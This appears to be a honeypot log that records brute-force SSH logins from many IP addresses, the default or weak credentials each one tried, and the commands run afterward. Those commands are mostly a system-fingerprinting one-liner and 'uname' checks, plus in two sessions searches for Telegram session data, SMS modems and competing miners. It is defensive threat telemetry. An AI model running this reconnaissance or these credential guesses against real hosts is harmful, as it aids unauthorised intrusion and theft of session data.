$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 yankee_root_17 (137.184.148.67) — North Bergen, United States · 1 session · 4 cmds

2026-03-05 15:03 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 tiger_root_7 (139.59.11.94) — Bengaluru, India · 10 sessions · 40 cmds

2026-03-05 14:22 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 lotus_sol_2 (168.144.28.69) — Bengaluru, India · 16 sessions · 16 cmds

2026-03-05 14:10 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 scone_root_7 (206.189.19.107) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-03-05 14:11 EST · as admin/admin123, root/1234, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 eagle_root_18 (104.131.78.91) — Clifton, United States · 4 sessions · 16 cmds

2026-03-05 12:55 EST · as root/12345678, root/admin, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 scone_root_15 (144.126.224.157) — Slough, United Kingdom · 6 sessions · 24 cmds

2026-03-05 12:49 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 rogue_root_52 (188.166.236.67) — Singapore, Singapore · 2 sessions · 8 cmds

2026-03-05 12:25 EST · as root/1234, root/12345678

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 lotus_root_14 (20.219.107.73) — Chennai, India · 2 sessions · 8 cmds

2026-03-05 08:02 EST · as root/admin, root/toor

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 cipher_sol_3 (157.245.193.43) — Singapore, Singapore · 8 sessions · 8 cmds

2026-03-04 15:22 EST · as sol/sol, ubuntu/ubuntu

Ran uname 8x across 8 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×8

↳ obfuscated system check

🎭 reef_sol (209.38.93.137) — Sydney, Australia · 4 sessions · 4 cmds

2026-03-04 22:57 EST · as sol/sol, solana/solana

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×4

↳ obfuscated system check

🎭 star_sol_6 (161.35.135.113) — Clifton, United States · 3 sessions · 3 cmds

2026-03-05 05:56 EST · as firedancer/firedancer, sol/sol, ubuntu/ubuntu

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×3

↳ obfuscated system check

🎭 burger_sol_5 (45.55.188.115) — Clifton, United States · 1 session · 1 cmd

2026-03-05 05:54 EST · as sol/sol

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m

↳ obfuscated system check

🎭 liberty_sol_6 (64.23.237.154) — Santa Clara, United States · 6 sessions · 6 cmds

2026-03-04 19:02 EST · as firedancer/firedancer, sol/sol, solana/solana

Ran uname 6x across 6 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×6

↳ obfuscated system check

🎭 eagle_sol_3 (157.230.219.41) — North Bergen, United States · 2 sessions · 2 cmds

2026-03-05 00:04 EST · as sol/sol

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×2

↳ obfuscated system check

🎭 lotus_sol (165.232.191.98) — Bengaluru, India · 16 sessions · 16 cmds

2026-03-05 04:33 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 autobahn_sol_2 (46.101.251.163) — Frankfurt am Main, Germany · 4 sessions · 4 cmds

2026-03-04 18:15 EST · as solana/solana, solv/solv

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×4

↳ obfuscated system check

🎭 windmill_sol_2 (167.172.42.243) — Amsterdam, Netherlands · 9 sessions · 9 cmds

2026-03-05 03:28 EST · as firedancer/firedancer, jito/jito, sol/sol

Ran uname 9x across 9 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×9

↳ obfuscated system check

🎭 dutch_sol_3 (159.223.225.168) — Amsterdam, Netherlands · 6 sessions · 6 cmds

2026-03-04 20:20 EST · as solv/123456, solv/solv

Ran uname 6x across 6 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×6

↳ obfuscated system check

🎭 star_sol_7 (143.244.190.213) — Santa Clara, United States · 5 sessions · 5 cmds

2026-03-05 01:40 EST · as sol/12345678, sol/sol, solana/solana

Ran uname 5x across 5 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×5

↳ obfuscated system check

🎭 fjord_root_6 (92.33.220.210) — Eskilstuna, Sweden · 1 session · 9 cmds

2026-03-05 01:47 EST · as root/admin

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 gouda_sol_8 (157.245.68.119) — Amsterdam, Netherlands · 10 sessions · 10 cmds

2026-03-05 00:19 EST · as eth/eth, sol/123, sol/sol

Ran uname 10x across 10 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×10

↳ obfuscated system check

🎭 cowboy_sol_8 (157.230.83.123) — North Bergen, United States · 3 sessions · 3 cmds

2026-03-04 21:32 EST · as solana/solana

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×3

↳ obfuscated system check

🎭 star_sol_2 (64.23.142.199) — Santa Clara, United States · 16 sessions · 16 cmds

2026-03-04 23:02 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 bike_sol_5 (104.248.94.247) — Amsterdam, Netherlands · 2 sessions · 2 cmds

2026-03-04 22:43 EST · as solana/solana, solv/solv

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×2

↳ obfuscated system check

🎭 burger_sol_2 (146.190.124.144) — Santa Clara, United States · 10 sessions · 10 cmds

2026-03-04 18:32 EST · as admin/admin, admin/admin123, postgres/postgres

Ran uname 10x across 10 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×10

↳ obfuscated system check

🎭 k-pop_root_7 (116.34.14.135) — Donggu, South Korea · 1 session · 9 cmds

2026-03-04 21:54 EST · as root/admin

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 star_sol_8 (174.138.87.207) — Clifton, United States · 12 sessions · 12 cmds

2026-03-04 19:18 EST · as sol/sol, solana/solana, solv/123456

Ran uname 12x across 12 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×12

↳ obfuscated system check

🎭 bike_root_11 (152.42.140.77) — Amsterdam, Netherlands · 1 session · 1 cmd

2026-03-04 20:42 EST · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m

↳ obfuscated system check

🎭 clog_sol (152.42.143.137) — Amsterdam, Netherlands · 16 sessions · 16 cmds

2026-03-04 20:01 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 gouda_root_13 (188.166.54.43) — Amsterdam, Netherlands · 1 session · 1 cmd

2026-03-04 20:16 EST · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m

↳ obfuscated system check

🎭 gouda_sol_6 (188.166.45.126) — Amsterdam, Netherlands · 16 sessions · 16 cmds

2026-03-04 18:46 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 pretzel_root_16 (88.99.24.59) — Falkenstein, Germany · 4 sessions · 16 cmds

2026-03-03 13:02 EST · as admin/123456, root/1234, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 dutch_root_10 (178.62.207.223) — Amsterdam, Netherlands · 1 session · 1 cmd

2026-03-04 16:41 EST · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m

↳ obfuscated system check

🎭 pretzel_root_17 (138.68.92.87) — Frankfurt am Main, Germany · 1 session · 4 cmds

2026-03-04 14:09 EST · as root/1234

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 eagle_root_19 (66.29.128.133) — Phoenix, United States · 2 sessions · 8 cmds

2026-03-04 13:08 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 star_root_18 (67.205.161.207) — North Bergen, United States · 4 sessions · 16 cmds

2026-03-04 08:35 EST · as root/1234, root/admin, root/toor

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 tea_root_11 (68.183.39.19) — Slough, United Kingdom · 1 session · 4 cmds

2026-03-04 12:40 EST · as admin/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 fog_root_3 (161.35.32.19) — Slough, United Kingdom · 7 sessions · 28 cmds

2026-03-04 11:23 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 7x)

